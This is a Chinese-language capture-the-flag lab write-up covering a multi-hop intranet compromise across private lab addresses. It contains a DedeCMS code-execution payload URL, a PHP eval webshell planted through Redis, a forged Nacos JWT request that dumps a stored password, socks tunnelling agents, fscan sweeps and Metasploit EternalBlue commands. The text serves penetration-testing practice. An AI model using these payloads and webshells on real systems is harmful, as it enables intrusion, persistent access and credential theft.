外网信息收集
扫扫端口,数据库,ftp 等端口均没有爆破出密码
看看 web 站点,版本为DedeCMS_V57_UTF8_SP2
http://192.168.111.20:8080/
外网漏洞利用
老版本了,nday 很多,自行了解
http://192.168.111.20:8080/dede/login.php
弱口令 admin/admin 登录
Dedecms V5.7后台任意代码执行[CVE-2018-7700]
漏洞原理https://xz.aliyun.com/t/2224
构造payload
1
| http://192.168.111.20:8080/dede/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}system(whoami);{/dede:field}
|
我这里直接改了附件类型,上传了一句话木马
上传文件
连接
http://192.168.111.20:8080/uploads/soft/251107/1_1437493351.php
密码 pass
第一层内网
没什么信息,双网卡,挂个代理继续扫吧
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| C:/phpstudy_pro/WWW/dedecms/uploads/soft/251107/ >ipconfig
Windows IP ����
��̫�������� Ethernet0:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::2161:f12b:1258:f6dd%16
IPv4 ��ַ . . . . . . . . . . . . : 192.168.111.20
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . :
��̫�������� Ethernet2:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::880f:3a86:aca9:e8b6%13
IPv4 ��ַ . . . . . . . . . . . . : 192.168.52.2
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . :
C:/phpstudy_pro/WWW/dedecms/uploads/soft/251107/ >
NULL
C:/phpstudy_pro/WWW/dedecms/uploads/soft/251107/ >whoami
nt authority\system
C:/phpstudy_pro/WWW/dedecms/uploads/soft/251107/ >
|
上传windows_x64_agent.exe 拉个代理出来
windows_x64_agent.exe -c 192.168.111.25:9999 -s pass --reconnect 10
./macos_arm64_admin -l 9999 -s pass
use 0
socks 55667 123 123
socks5://123:123@127.0.0.1:55667
掏出 fscan 大宝贝
sudo ./fscan_mac_arm64 -socks5 123:123@127.0.0.1:55667 -h 192.168.52.2/24
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| aqi@aqideMacBook-Pro fscan % sudo ./fscan_mac_arm64 -socks5 123:123@127.0.0.1:55667 -h 192.168.52.2/24
Password:
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
Socks5Proxy: socks5://123:123@127.0.0.1:55667
start infoscan
192.168.52.2:21 open
192.168.52.4:22 open
192.168.52.4:80 open
192.168.52.2:135 open
192.168.52.2:139 open
192.168.52.2:445 open
192.168.52.2:3306 open
192.168.52.4:6379 open
192.168.52.2:8080 open
192.168.52.4:8848 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle http://192.168.52.4 code:200 len:0 title:None
[*] WebTitle http://192.168.52.2:8080 code:200 len:14405 title:我的网站
[+] InfoScan http://192.168.52.2:8080 [CMS]
[*] WebTitle http://192.168.52.4:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] PocScan http://192.168.52.4:8848 poc-yaml-alibaba-nacos
[+] PocScan http://192.168.52.2:8080 poc-yaml-dedecms-cve-2018-6910
[+] PocScan http://192.168.52.4:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
已完成 9/10 [-] redis 192.168.52.4:6379 a12345 <nil>
已完成 10/10
[*] 扫描结束,耗时: 17m57.835105167s
aqi@aqideMacBook-Pro fscan %
aqi@aqideMacBook-Pro fscan %
|
Nacos
nacos 扫到未授权访问和认证绕过,尝试弱口令登录失败
http://192.168.52.4:8848/nacos/#/login
利用默认密钥生成的 jwt 直接读取配置文件发现一个 flag 和 password
P@ssw0rd_sec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| GET /nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q HTTP/1.1
Host: 192.168.52.4:8848
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q
Referer: http://192.168.52.4:8848/nacos/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Date: Fri, 07 Nov 2025 07:47:15 GMT
Keep-Alive: timeout=60
Connection: keep-alive
Content-Length: 513
{"totalCount":3,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"id":"831059083068456960","dataId":"123","group":"DEFAULT_GROUP","content":"123","md5":null,"tenant":"","appName":"","type":"text"},{"id":"831060879946039296","dataId":"flag","group":"DEFAULT_GROUP","content":"flag{7b4b73d7e9ef1c5959efbb820de2495e}","md5":null,"tenant":"","appName":"","type":"text"},{"id":"831061269961785344","dataId":"password","group":"DEFAULT_GROUP","content":"P@ssw0rd_sec","md5":null,"tenant":"","appName":"","type":"text"}]}
|
用这个找到的密码分别尝试 redis 和 ssh
redis 连接成功
Redis rce
fscan 扫到的 80 端口扫扫目录发现 phpinfo
http://192.168.52.4/phpinfo.php
发现路径,redis 写入文件
1
2
3
4
| config set dir /var/www/html/
config set dbfilename redis.php
set webshell "<?php @eval($_POST['pass']);?>"
save
|
http://192.168.52.4/redis.php
密码:pass
根目录下发现 flag
第二层内网
上传linux_x64_agent拉个代理出来
chmod 777 linux_x64_agent
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| (www-data:/var/www/html) $ chmod 777 linux_x64_agent
(www-data:/var/www/html) $ ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.52.4 netmask 255.255.255.0 broadcast 192.168.52.255
inet6 fe80::250:56ff:feb1:7cb6 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b1:7c:b6 txqueuelen 1000 (Ethernet)
RX packets 18652 bytes 11466587 (11.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 12464 bytes 2721046 (2.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens37: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.37.2 netmask 255.255.255.0 broadcast 192.168.37.255
inet6 fe80::250:56ff:feb1:37bb prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b1:37:bb txqueuelen 1000 (Ethernet)
RX packets 277 bytes 34000 (34.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17 bytes 1276 (1.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 66915 bytes 5437410 (5.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 66915 bytes 5437410 (5.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
|
本机监听一下端口
listen
9999
linux_x64_agent -c 192.168.52.2:9999 -s pass --reconnect 10
use 1
socks 55668 123 123
socks5://123:123@127.0.0.1:55668
依旧 fscan
sudo ./fscan_mac_arm64 -socks5 123:123@127.0.0.1:55668 -h 192.168.37.2/24
有一台 192.168.37.6 存在 MS17-010
永恒之蓝
打开 kali 挂上本机代理
sudo vi /etc/proxychains4.conf
这里要 msf 打一个正向连接
1
2
3
4
5
6
7
8
| proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.37.6
set lport 4444
run
|
最后在桌面拿到 flag
flag{9dedc7f251eb6f0c1b7bd779bb799d34}